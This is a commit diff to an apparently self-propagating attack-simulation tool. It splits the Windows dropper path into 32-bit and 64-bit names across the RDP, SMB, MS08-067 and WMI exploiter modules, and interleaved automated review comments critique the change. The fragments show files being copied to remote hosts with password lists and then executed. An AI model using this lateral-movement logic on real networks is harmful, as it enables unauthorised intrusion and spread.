Monkey now uses different names for 32,64bit on windows.

No need to use the dropper or rename the monkey.
Itay Mizeretz 2018-03-04 17:05:43 +02:00
parent 72fd930499
commit ee23703bfa
8 changed files with 34 additions and 36 deletions


@ -9,6 +9,7 @@ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter
SambaCryExploiter, ElasticGroovyExploiter SambaCryExploiter, ElasticGroovyExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger
from network.range import FixedRange from network.range import FixedRange
from windows_upgrader import WindowsUpgrader
__author__ = 'itamar' __author__ = 'itamar'
@ -115,14 +116,12 @@ class Configuration(object):
dropper_set_date = True dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh' dropper_date_reference_path_linux = '/bin/sh'
dropper_target_path = r"C:\Windows\monkey.exe" dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
dropper_target_path_linux = '/tmp/monkey' dropper_target_path_linux = '/tmp/monkey'
########################### def get_dropper_target_path_win(self):
# Windows upgrader config return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32
###########################
windows_upgrader_temp_path = r"C:\Windows\monkey64.exe"
########################### ###########################
# Kill file # Kill file
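Review bot: The added `from windows_upgrader import WindowsUpgrader` creates an import cycle, because windows_upgrader.py itself does `from config import WormConfiguration` at module level (visible in its section of this commit). Depending on which module is loaded first, one of the two `from ... import` statements can run against a half-initialised module and raise ImportError. Either move `is_64bit_python()` into a small helper module that imports nothing from the project, or defer the import by making `from windows_upgrader import WindowsUpgrader` the first line of `get_dropper_target_path_win`. A one-line docstring on that method saying whose bitness it reports would also help readers of the call sites.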


@ -22,8 +22,8 @@
"dropper_log_path_windows": "%temp%\\~df1562.tmp", "dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562", "dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true, "dropper_set_date": true,
"dropper_target_path": "C:\\Windows\\monkey.exe", "dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
"windows_upgrader_temp_path": "C:\\Windows\\monkey64.exe", "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey", "dropper_target_path_linux": "/tmp/monkey",


@ -278,11 +278,11 @@ class RdpExploiter(HostExploiter):
if self._config.rdp_use_vbs_download: if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % { command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path, 'monkey_path': self._config.get_dropper_target_path_win(),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
else: else:
command = RDP_CMDLINE_HTTP_BITS % { command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path, 'monkey_path': self._config.get_dropper_target_path_win(),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
user_password_pairs = self._config.get_exploit_user_password_pairs() user_password_pairs = self._config.get_exploit_user_password_pairs()
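Review bot: The `monkey_path` given to both command templates now comes from `get_dropper_target_path_win()`, which per the config.py section keys on `WindowsUpgrader.is_64bit_python()`, so the name appears to follow the interpreter running this code rather than the machine the command is built for. If the two architectures differ, the file name would say 64 while the binary is 32-bit (or the reverse), which misleads anyone cleaning up or triaging after a run. Consider passing the architecture explicitly, e.g. `get_dropper_target_path_win(is_64bit)`, or add a comment stating that the name deliberately tracks the sender. The same call appears in the SmbExploiter, Ms08_067_Exploiter and WmiExploiter sections. The enclosing method starts and ends outside this hunk.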


@ -57,7 +57,7 @@ class SmbExploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
user, user,
password, password,
lm_hash, lm_hash,
@ -85,9 +85,9 @@ class SmbExploiter(HostExploiter):
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower(): if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)
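Review bot: `self._config.get_dropper_target_path_win()` is evaluated three times in this method: as the `copy_file` argument, in the `.lower()` comparison and as the `build_monkey_commandline` argument. That makes the lines very long and would let the three values diverge if the helper ever stops being a pure lookup. Bind it once with `target_path = self._config.get_dropper_target_path_win()` and use `target_path` in all three places. The Ms08_067_Exploiter and WmiExploiter sections repeat the same pattern. The method body extends beyond the visible hunks.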


@ -214,7 +214,7 @@ class Ms08_067_Exploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
self._config.ms08_067_remote_user_add, self._config.ms08_067_remote_user_add,
self._config.ms08_067_remote_user_pass) self._config.ms08_067_remote_user_pass)
@ -223,7 +223,7 @@ class Ms08_067_Exploiter(HostExploiter):
for password in self._config.exploit_password_list: for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
"Administrator", "Administrator",
password) password)
if remote_full_path: if remote_full_path:
@ -233,9 +233,9 @@ class Ms08_067_Exploiter(HostExploiter):
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower(): if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)


@ -77,7 +77,7 @@ class WmiExploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
user, user,
password, password,
lm_hash, lm_hash,
@ -88,9 +88,9 @@ class WmiExploiter(HostExploiter):
wmi_connection.close() wmi_connection.close()
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path.lower(): elif remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)


@ -10,7 +10,7 @@ import monkeyfs
from config import WormConfiguration from config import WormConfiguration
from control import ControlClient from control import ControlClient
from exploit.tools import build_monkey_commandline_explicitly from exploit.tools import build_monkey_commandline_explicitly
from model import DROPPER_CMDLINE_WINDOWS from model import MONKEY_CMDLINE_WINDOWS
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
@ -45,15 +45,15 @@ class WindowsUpgrader(object):
monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False) monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file: with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
monkey_bin = downloaded_monkey_file.read() monkey_bin = downloaded_monkey_file.read()
with open(WormConfiguration.windows_upgrader_temp_path, 'wb') as written_monkey_file: with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:
written_monkey_file.write(monkey_bin) written_monkey_file.write(monkey_bin)
depth = int(opts.depth) if opts.depth is not None else None depth = int(opts.depth) if opts.depth is not None else None
monkey_options = build_monkey_commandline_explicitly( monkey_options = build_monkey_commandline_explicitly(
opts.parent, opts.tunnel, opts.server, depth, WormConfiguration.dropper_target_path) opts.parent, opts.tunnel, opts.server, depth)
monkey_cmdline = DROPPER_CMDLINE_WINDOWS % { monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {
'dropper_path': WormConfiguration.windows_upgrader_temp_path} + monkey_options 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options
monkey_process = subprocess.Popen(monkey_cmdline, shell=True, monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
stdin=None, stdout=None, stderr=None, stdin=None, stdout=None, stderr=None,
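Review bot: `monkey_cmdline` is built by `%`-formatting the configured `dropper_target_path_win_64` into `MONKEY_CMDLINE_WINDOWS` and is then run with `shell=True`, so a space or shell metacharacter in that configuration value changes what gets executed. The template is not visible here, so whether it already quotes the path is unknown. If it does not, quote the value before formatting, e.g. `'monkey_path': subprocess.list2cmdline([WormConfiguration.dropper_target_path_win_64])`, or build an argument list and drop `shell=True`. The `Popen` call continues past the end of the hunk.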


@ -350,14 +350,7 @@ SCHEMA = {
"type": "integer", "type": "integer",
"default": 60, "default": 60,
"description": "Time to keep tunnel open before going down after last exploit (in seconds)" "description": "Time to keep tunnel open before going down after last exploit (in seconds)"
}, }
"windows_upgrader_temp_path": {
"title": "Temporary upgrade path for 64bit monkey on Windows",
"type": "string",
"default": "C:\\Windows\\monkey64.exe",
"description": "Determines where should the dropper place the 64 bit monkey while"
" upgrading on a Windows machine"
},
} }
}, },
"classes": { "classes": {
@ -447,10 +440,16 @@ SCHEMA = {
"default": "/tmp/monkey", "default": "/tmp/monkey",
"description": "Determines where should the dropper place the monkey on a Linux machine" "description": "Determines where should the dropper place the monkey on a Linux machine"
}, },
"dropper_target_path": { "dropper_target_path_win_32": {
"title": "Dropper target path on Windows", "title": "Dropper target path on Windows (32bit)",
"type": "string", "type": "string",
"default": "C:\\Windows\\monkey.exe", "default": "C:\\Windows\\monkey32.exe",
"description": "Determines where should the dropper place the monkey on a Windows machine"
},
"dropper_target_path_win_64": {
"title": "Dropper target path on Windows (64bit)",
"type": "string",
"default": "C:\\Windows\\monkey64.exe",
"description": "Determines where should the dropper place the monkey on a Windows machine" "description": "Determines where should the dropper place the monkey on a Windows machine"
}, },
"dropper_try_move_first": { "dropper_try_move_first": {
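Review bot: The new `dropper_target_path_win_32` and `dropper_target_path_win_64` entries carry the same description, so the configuration text does not tell them apart; use `"Determines where should the dropper place the 32 bit monkey on a Windows machine"` and the 64 bit equivalent. The old keys `dropper_target_path` and `windows_upgrader_temp_path` are dropped with no visible handling for configurations already stored under them; unless that exists elsewhere, saved values would presumably be ignored silently. It is also worth saying in the description that these paths are the on-disk file names, since cleanup notes written for `C:\Windows\monkey.exe` no longer match the defaults.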